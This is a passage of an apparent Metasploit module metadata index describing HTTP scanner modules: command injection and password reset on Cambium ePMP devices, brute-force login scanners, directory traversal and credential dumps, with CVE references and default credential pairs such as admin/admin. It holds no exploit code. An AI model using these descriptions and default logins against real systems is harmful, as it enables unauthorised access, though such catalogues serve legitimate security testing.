"description": "This module pulls and parses the URLs stored by Archive.org for the purpose of\n replaying during a web assessment. Finding unlinked and old pages.",
"references": [
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/enum_wayback.rb",
"is_install_path": true,
"ref_name": "scanner/http/enum_wayback",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/epmp1000_dump_config": {
"name": "Cambium ePMP 1000 Dump Device Config",
"full_name": "auxiliary/scanner/http/epmp1000_dump_config",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Karn Ganeshen <KarnGaneshen@gmail.com>"
],
"description": "This module dumps Cambium ePMP 1000 device configuration file. An\n ePMP 1000 box has four (4) login accounts - admin/admin, installer/installer,\n home/home, and readonly/readonly. This module requires any one of the following\n login credentials - admin / installer / home - to dump device configuration\n file.",
"references": [
"URL-http://ipositivesecurity.com/2015/11/28/cambium-epmp-1000-multiple-vulnerabilities/"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-12-19 16:53:02 +0000",
"path": "/modules/auxiliary/scanner/http/epmp1000_dump_config.rb",
"is_install_path": true,
"ref_name": "scanner/http/epmp1000_dump_config",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_scanner/http/epmp1000_dump_hashes": {
"name": "Cambium ePMP 1000 'ping' Password Hash Extractor (up to v2.5)",
"full_name": "auxiliary/scanner/http/epmp1000_dump_hashes",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Karn Ganeshen <KarnGaneshen@gmail.com>"
],
"description": "This module exploits an OS Command Injection vulnerability in Cambium\n ePMP 1000 (<v2.5) device management portal. It requires any one of the\n following login credentials - admin/admin, installer/installer, home/home - to\n dump system hashes.",
"references": [
"URL-http://ipositivesecurity.com/2015/11/28/cambium-epmp-1000-multiple-vulnerabilities/",
"URL-https://support.cambiumnetworks.com/file/476262a0256fdd8be0e595e51f5112e0f9700f83"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-12-19 17:02:16 +0000",
"path": "/modules/auxiliary/scanner/http/epmp1000_dump_hashes.rb",
"is_install_path": true,
"ref_name": "scanner/http/epmp1000_dump_hashes",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_scanner/http/epmp1000_get_chart_cmd_exec": {
"name": "Cambium ePMP 1000 'get_chart' Command Injection (v3.1-3.5-RC7)",
"full_name": "auxiliary/scanner/http/epmp1000_get_chart_cmd_exec",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Karn Ganeshen <KarnGaneshen@gmail.com>"
],
"description": "This module exploits an OS Command Injection vulnerability in Cambium\n ePMP 1000 (v3.1-3.5-RC7) device management portal. It requires any one of the\n following login credentials - admin/admin, installer/installer, home/home - to\n execute arbitrary system commands.",
"references": [
"CVE-2017-5255",
"URL-https://blog.rapid7.com/2017/12/19/r7-2017-25-cambium-epmp-and-cnpilot-multiple-vulnerabilities"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-12-23 00:14:27 +0000",
"path": "/modules/auxiliary/scanner/http/epmp1000_get_chart_cmd_exec.rb",
"is_install_path": true,
"ref_name": "scanner/http/epmp1000_get_chart_cmd_exec",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_scanner/http/epmp1000_ping_cmd_exec": {
"name": "Cambium ePMP 1000 'ping' Command Injection (up to v2.5)",
"full_name": "auxiliary/scanner/http/epmp1000_ping_cmd_exec",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Karn Ganeshen <KarnGaneshen@gmail.com>"
],
"description": "This module exploits an OS Command Injection vulnerability in Cambium\n ePMP 1000 (<v2.5) device management portal. It requires any one of the\n following login credentials - admin/admin, installer/installer, home/home - to\n execute arbitrary system commands.",
"references": [
"URL-http://ipositivesecurity.com/2015/11/28/cambium-epmp-1000-multiple-vulnerabilities/",
"URL-https://support.cambiumnetworks.com/file/476262a0256fdd8be0e595e51f5112e0f9700f83"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-12-23 00:14:27 +0000",
"path": "/modules/auxiliary/scanner/http/epmp1000_ping_cmd_exec.rb",
"is_install_path": true,
"ref_name": "scanner/http/epmp1000_ping_cmd_exec",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_scanner/http/epmp1000_reset_pass": {
"name": "Cambium ePMP 1000 Account Password Reset",
"full_name": "auxiliary/scanner/http/epmp1000_reset_pass",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Karn Ganeshen <KarnGaneshen@gmail.com>"
],
"description": "This module exploits an access control vulnerability in Cambium ePMP\n device management portal. It requires any one of the following non-admin login\n credentials - installer/installer, home/home - to reset password of other\n existing user(s) including 'admin'. All versions <=3.5 are affected. This\n module works on versions 3.0-3.5-RC7.",
"references": [
"CVE-2017-5254",
"URL-https://blog.rapid7.com/2017/12/19/r7-2017-25-cambium-epmp-and-cnpilot-multiple-vulnerabilities"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-12-23 00:14:27 +0000",
"path": "/modules/auxiliary/scanner/http/epmp1000_reset_pass.rb",
"is_install_path": true,
"ref_name": "scanner/http/epmp1000_reset_pass",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_scanner/http/epmp1000_web_login": {
"name": "Cambium ePMP 1000 Login Scanner",
"full_name": "auxiliary/scanner/http/epmp1000_web_login",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Karn Ganeshen <KarnGaneshen@gmail.com>"
],
"description": "This module scans for Cambium ePMP 1000 management login portal(s), and\n attempts to identify valid credentials. Default login credentials are -\n admin/admin, installer/installer, home/home and readonly/readonly.",
"references": [
"URL-http://ipositivesecurity.com/2015/11/28/cambium-epmp-1000-multiple-vulnerabilities/"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-12-19 16:48:41 +0000",
"path": "/modules/auxiliary/scanner/http/epmp1000_web_login.rb",
"is_install_path": true,
"ref_name": "scanner/http/epmp1000_web_login",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/error_sql_injection": {
"name": "HTTP Error Based SQL Injection Scanner",
"full_name": "auxiliary/scanner/http/error_sql_injection",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"et <et@metasploit.com>"
],
"description": "This module identifies the existence of Error Based SQL injection issues. Still requires a lot of work",
"references": [
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-08-26 21:01:10 +0000",
"path": "/modules/auxiliary/scanner/http/error_sql_injection.rb",
"is_install_path": true,
"ref_name": "scanner/http/error_sql_injection",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/es_file_explorer_open_port": {
"name": "ES File Explorer Open Port",
"full_name": "auxiliary/scanner/http/es_file_explorer_open_port",
"rank": 300,
"disclosure_date": "2019-01-16",
"type": "auxiliary",
"author": [
"小荷才露尖尖角",
"moonbocal",
"fs0c131y",
"h00die"
],
"description": "This module connects to ES File Explorer's HTTP server to run\n certain commands. The HTTP server is started on app launch, and is available\n as long as the app is open. Version 4.1.9.7.4 and below are reported vulnerable\n This module has been tested against 4.1.9.5.1.",
"references": [
"CVE-2019-6447",
"URL-https://www.ms509.com/2016/03/01/es-explorer-vul/",
"URL-https://github.com/fs0c131y/ESFileExplorerOpenPortVuln",
"URL-https://twitter.com/fs0c131y/status/1085460755313508352"
],
"platform": "",
"arch": "",
"rport": 59777,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2019-03-26 19:39:17 +0000",
"path": "/modules/auxiliary/scanner/http/es_file_explorer_open_port.rb",
"is_install_path": true,
"ref_name": "scanner/http/es_file_explorer_open_port",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/etherpad_duo_login": {
"name": "EtherPAD Duo Login Bruteforce Utility",
"full_name": "auxiliary/scanner/http/etherpad_duo_login",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Karn Ganeshen <KarnGaneshen@gmail.com>"
],
"description": "This module scans for EtherPAD Duo login portal, and\n performs a login bruteforce attack to identify valid credentials.",
"references": [
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/etherpad_duo_login.rb",
"is_install_path": true,
"ref_name": "scanner/http/etherpad_duo_login",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/f5_bigip_virtual_server": {
"name": "F5 BigIP HTTP Virtual Server Scanner",
"full_name": "auxiliary/scanner/http/f5_bigip_virtual_server",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Denis Kolegov <dnkolegov@gmail.com>",
"Oleg Broslavsky <ovbroslavsky@gmail.com>",
"Nikita Oleksov <neoleksov@gmail.com>"
],
"description": "This module scans for BigIP HTTP virtual servers using banner grabbing. BigIP system uses\n different HTTP profiles for managing HTTP traffic and these profiles allow to customize\n the string used as Server HTTP header. The default values are \"BigIP\" or \"BIG-IP\" depending\n on the BigIP system version.",
"references": [
"URL-https://www.owasp.org/index.php/SCG_D_BIGIP"
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/f5_bigip_virtual_server.rb",
"is_install_path": true,
"ref_name": "scanner/http/f5_bigip_virtual_server",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/f5_mgmt_scanner": {
"name": "F5 Networks Devices Management Interface Scanner",
"full_name": "auxiliary/scanner/http/f5_mgmt_scanner",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Denis Kolegov <dnkolegov@gmail.com>",
"Oleg Broslavsky <ovbroslavsky@gmail.com>",
"Nikita Oleksov <neoleksov@gmail.com>"
],
"description": "This module scans for web management interfaces of the following F5 Networks devices:\n BigIP, BigIQ, Enterprise Manager, ARX, and FirePass.",
"references": [
],
"platform": "",
"arch": "",
"rport": 443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/f5_mgmt_scanner.rb",
"is_install_path": true,
"ref_name": "scanner/http/f5_mgmt_scanner",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/file_same_name_dir": {
"name": "HTTP File Same Name Directory Scanner",
"full_name": "auxiliary/scanner/http/file_same_name_dir",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"et <et@metasploit.com>"
],
"description": "This module identifies the existence of files\n in a given directory path named as the same name of the\n directory.\n\n Only works if PATH is different than '/'.",
"references": [
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-08-26 21:01:10 +0000",
"path": "/modules/auxiliary/scanner/http/file_same_name_dir.rb",
"is_install_path": true,
"ref_name": "scanner/http/file_same_name_dir",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/files_dir": {
"name": "HTTP Interesting File Scanner",
"full_name": "auxiliary/scanner/http/files_dir",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"et <et@metasploit.com>"
],
"description": "This module identifies the existence of interesting files\n in a given directory path.",
"references": [
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/files_dir.rb",
"is_install_path": true,
"ref_name": "scanner/http/files_dir",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/fortinet_ssl_vpn": {
"name": "Fortinet SSL VPN Bruteforce Login Utility",
"full_name": "auxiliary/scanner/http/fortinet_ssl_vpn",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Max Michels <kontakt@maxmichels.de>"
],
"description": "This module scans for Fortinet SSL VPN web login portals and\n performs login brute force to identify valid credentials.",
"references": [
],
"platform": "",
"arch": "",
"rport": 443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2019-02-19 22:33:10 +0000",
"path": "/modules/auxiliary/scanner/http/fortinet_ssl_vpn.rb",
"is_install_path": true,
"ref_name": "scanner/http/fortinet_ssl_vpn",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/frontpage_credential_dump": {
"name": "FrontPage .pwd File Credential Dump",
"full_name": "auxiliary/scanner/http/frontpage_credential_dump",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Aditya K Sood <Aditya K Sood @adityaksood>",
"Stephen Haywood <Stephen Haywood @averagesecguy>"
],
"description": "This module downloads and parses the '_vti_pvt/service.pwd',\n '_vti_pvt/administrators.pwd', and '_vti_pvt/authors.pwd' files on a FrontPage\n server to find credentials.",
"references": [
"PACKETSTORM-11556",
"URL-https://insecure.org/sploits/Microsoft.frontpage.insecurities.html",
"URL-http://sparty.secniche.org/"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2018-09-21 12:44:10 +0000",
"path": "/modules/auxiliary/scanner/http/frontpage_credential_dump.rb",
"is_install_path": true,
"ref_name": "scanner/http/frontpage_credential_dump",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/frontpage_login": {
"name": "FrontPage Server Extensions Anonymous Login Scanner",
"full_name": "auxiliary/scanner/http/frontpage_login",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Matteo Cantoni <goony@nothink.org>"
],
"description": "This module queries the FrontPage Server Extensions and determines whether anonymous access is allowed.",
"references": [
"URL-http://en.wikipedia.org/wiki/Microsoft_FrontPage",
"URL-http://msdn2.microsoft.com/en-us/library/ms454298.aspx"
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/frontpage_login.rb",
"is_install_path": true,
"ref_name": "scanner/http/frontpage_login",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/gavazzi_em_login_loot": {
"name": "Carlo Gavazzi Energy Meters - Login Brute Force, Extract Info and Dump Plant Database",
"full_name": "auxiliary/scanner/http/gavazzi_em_login_loot",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Karn Ganeshen <KarnGaneshen@gmail.com>"
],
"description": "This module scans for Carlo Gavazzi Energy Meters login portals, performs a login brute force attack, enumerates device firmware version, and attempt to extract the SMTP configuration. A valid, admin privileged user is required to extract the SMTP password. In some older firmware versions, the SMTP config can be retrieved without any authentication. The module also exploits an access control vulnerability which allows an unauthenticated user to remotely dump the database file EWplant.db. This db file contains information such as power/energy utilization data, tariffs, and revenue statistics. Vulnerable firmware versions include - VMU-C EM prior to firmware Version A11_U05 and VMU-C PV prior to firmware Version A17.",
"references": [
"URL-https://ics-cert.us-cert.gov/advisories/ICSA-17-012-03"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/gavazzi_em_login_loot.rb",
"is_install_path": true,
"ref_name": "scanner/http/gavazzi_em_login_loot",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_scanner/http/git_scanner": {
"name": "HTTP Git Scanner",
"full_name": "auxiliary/scanner/http/git_scanner",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Nixawk",
"Jon Hart <jon_hart@rapid7.com>"
],
"description": "This module can detect situations where there may be information\n disclosure vulnerabilities that occur when a Git repository is made\n available over HTTP.",
"references": [
"URL-https://github.com/git/git/blob/master/Documentation/technical/index-format.txt"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/git_scanner.rb",
"is_install_path": true,
"ref_name": "scanner/http/git_scanner",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/gitlab_login": {
"name": "GitLab Login Utility",
"full_name": "auxiliary/scanner/http/gitlab_login",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Ben Campbell <eat_meatballs@hotmail.co.uk>"
],
"description": "This module attempts to login to a GitLab instance using a specific user/pass.",
"references": [
"URL-https://labs.mwrinfosecurity.com/blog/2015/03/20/gitlab-user-enumeration/"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2019-03-05 03:38:51 +0000",
"path": "/modules/auxiliary/scanner/http/gitlab_login.rb",
"is_install_path": true,
"ref_name": "scanner/http/gitlab_login",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_scanner/http/gitlab_user_enum": {
"name": "GitLab User Enumeration",
"full_name": "auxiliary/scanner/http/gitlab_user_enum",
"rank": 300,
"disclosure_date": "2014-11-21",
"type": "auxiliary",
"author": [
"Ben Campbell <eat_meatballs@hotmail.co.uk>"
],
"description": "The GitLab 'internal' API is exposed unauthenticated on GitLab. This\n allows the username for each SSH Key ID number to be retrieved. Users\n who do not have an SSH Key cannot be enumerated in this fashion. LDAP\n users, e.g. Active Directory users will also be returned. This issue\n was fixed in GitLab v7.5.0 and is present from GitLab v5.0.0.",
"references": [
"URL-https://labs.mwrinfosecurity.com/blog/2015/03/20/gitlab-user-enumeration/"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/gitlab_user_enum.rb",
"is_install_path": true,
"ref_name": "scanner/http/gitlab_user_enum",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/glassfish_login": {
"name": "GlassFish Brute Force Utility",
"full_name": "auxiliary/scanner/http/glassfish_login",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Joshua Abraham <jabra@spl0it.org>",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module attempts to login to GlassFish instance using username and password\n combinations indicated by the USER_FILE, PASS_FILE, and USERPASS_FILE options.\n It will also try to do an authentication bypass against older versions of GlassFish.\n Note: by default, GlassFish 4.0 requires HTTPS, which means you must set the SSL option\n to true, and SSLVersion to TLS1. It also needs Secure Admin to access the DAS remotely.",
"references": [
"CVE-2011-0807",
"OSVDB-71948"
],
"platform": "",
"arch": "",
"rport": 4848,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/glassfish_login.rb",
"is_install_path": true,
"ref_name": "scanner/http/glassfish_login",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_scanner/http/glassfish_traversal": {
"name": "Path Traversal in Oracle GlassFish Server Open Source Edition",
"full_name": "auxiliary/scanner/http/glassfish_traversal",
"rank": 300,
"disclosure_date": "2015-08-08",
"type": "auxiliary",
"author": [
"Trustwave SpiderLabs",
"Dhiraj Mishra"
],
"description": "This module exploits an unauthenticated directory traversal vulnerability\n which exists in administration console of Oracle GlassFish Server 4.1, which is\n listening by default on port 4848/TCP.",
"references": [
"CVE-2017-1000028",
"URL-https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2015-016/?fid=6904",
"EDB-39441"
],
"platform": "",
"arch": "",
"rport": 4848,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2018-10-23 00:01:13 +0000",
"path": "/modules/auxiliary/scanner/http/glassfish_traversal.rb",
"is_install_path": true,
"ref_name": "scanner/http/glassfish_traversal",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/goahead_traversal": {
"name": "Embedthis GoAhead Embedded Web Server Directory Traversal",
"full_name": "auxiliary/scanner/http/goahead_traversal",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Matthew Daley",
"Roberto Soares Espreto <robertoespreto@gmail.com>"
],
"description": "This module exploits a directory traversal vulnerability in the Embedthis\n GoAhead Web Server v3.4.1, allowing an attacker to read arbitrary files\n with the web server privileges.",
"references": [
"CVE-2014-9707",
"PACKETSTORM-131156"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2019-03-05 03:38:51 +0000",
"path": "/modules/auxiliary/scanner/http/goahead_traversal.rb",
"is_install_path": true,
"ref_name": "scanner/http/goahead_traversal",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/groupwise_agents_http_traversal": {
"name": "Novell Groupwise Agents HTTP Directory Traversal",
"full_name": "auxiliary/scanner/http/groupwise_agents_http_traversal",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"r () b13$",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a directory traversal vulnerability in Novell Groupwise.\n The vulnerability exists in the web interface of both the Post Office and the\n MTA agents. This module has been tested successfully on Novell Groupwise 8.02 HP2\n over Windows 2003 SP2.",
"references": [
"CVE-2012-0419",
"OSVDB-85801",
"BID-55648",
"URL-http://www.novell.com/support/kb/doc.php?id=7010772"
],
"platform": "",
"arch": "",
"rport": 7181,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/groupwise_agents_http_traversal.rb",
"is_install_path": true,
"ref_name": "scanner/http/groupwise_agents_http_traversal",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/host_header_injection": {
"name": "HTTP Host Header Injection Detection",
"full_name": "auxiliary/scanner/http/host_header_injection",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Jay Turla",
"Medz Barao"
],
"description": "Checks if the host is vulnerable to Host header injection",
"references": [
"CVE-2016-10073",
"URL-http://www.skeletonscribe.net/2013/05/practical-http-host-header-attacks.html"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/host_header_injection.rb",
"is_install_path": true,
"ref_name": "scanner/http/host_header_injection",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/hp_imc_bims_downloadservlet_traversal": {
"name": "HP Intelligent Management BIMS DownloadServlet Directory Traversal",
"full_name": "auxiliary/scanner/http/hp_imc_bims_downloadservlet_traversal",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"rgod <rgod@autistici.org>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a lack of authentication and a directory traversal in HP\n Intelligent Management, specifically in the DownloadServlet from the BIMS component,\n in order to retrieve arbitrary files with SYSTEM privileges. This module has been\n tested successfully on HP Intelligent Management Center 5.1 E0202 with BIMS 5.1 E0201\n over Windows 2003 SP2.",
"references": [
"CVE-2013-4823",
"OSVDB-98248",
"BID-62897",
"ZDI-13-239"
],
"platform": "",
"arch": "",
"rport": 8080,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/hp_imc_bims_downloadservlet_traversal.rb",
"is_install_path": true,
"ref_name": "scanner/http/hp_imc_bims_downloadservlet_traversal",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/hp_imc_faultdownloadservlet_traversal": {
"name": "HP Intelligent Management FaultDownloadServlet Directory Traversal",
"full_name": "auxiliary/scanner/http/hp_imc_faultdownloadservlet_traversal",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"rgod <rgod@autistici.org>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a lack of authentication and a directory traversal in HP\n Intelligent Management, specifically in the FaultDownloadServlet, in order to\n retrieve arbitrary files with SYSTEM privileges. This module has been tested\n successfully on HP Intelligent Management Center 5.1 E0202 over Windows 2003 SP2.",
"references": [
"CVE-2012-5202",
"OSVDB-91027",
"BID-58675",
"ZDI-13-051"
],
"platform": "",
"arch": "",
"rport": 8080,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/hp_imc_faultdownloadservlet_traversal.rb",
"is_install_path": true,
"ref_name": "scanner/http/hp_imc_faultdownloadservlet_traversal",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/hp_imc_ictdownloadservlet_traversal": {
"name": "HP Intelligent Management IctDownloadServlet Directory Traversal",
"full_name": "auxiliary/scanner/http/hp_imc_ictdownloadservlet_traversal",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"rgod <rgod@autistici.org>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a lack of authentication and a directory traversal in HP\n Intelligent Management, specifically in the IctDownloadServlet, in order to\n retrieve arbitrary files with SYSTEM privileges. This module has been tested\n successfully on HP Intelligent Management Center 5.1 E0202 over Windows 2003 SP2.",
"references": [
"CVE-2012-5204",
"OSVDB-91029",
"BID-58676",
"ZDI-13-053"
],
"platform": "",
"arch": "",
"rport": 8080,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/hp_imc_ictdownloadservlet_traversal.rb",
"is_install_path": true,
"ref_name": "scanner/http/hp_imc_ictdownloadservlet_traversal",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/hp_imc_reportimgservlt_traversal": {
"name": "HP Intelligent Management ReportImgServlt Directory Traversal",
"full_name": "auxiliary/scanner/http/hp_imc_reportimgservlt_traversal",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"rgod <rgod@autistici.org>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
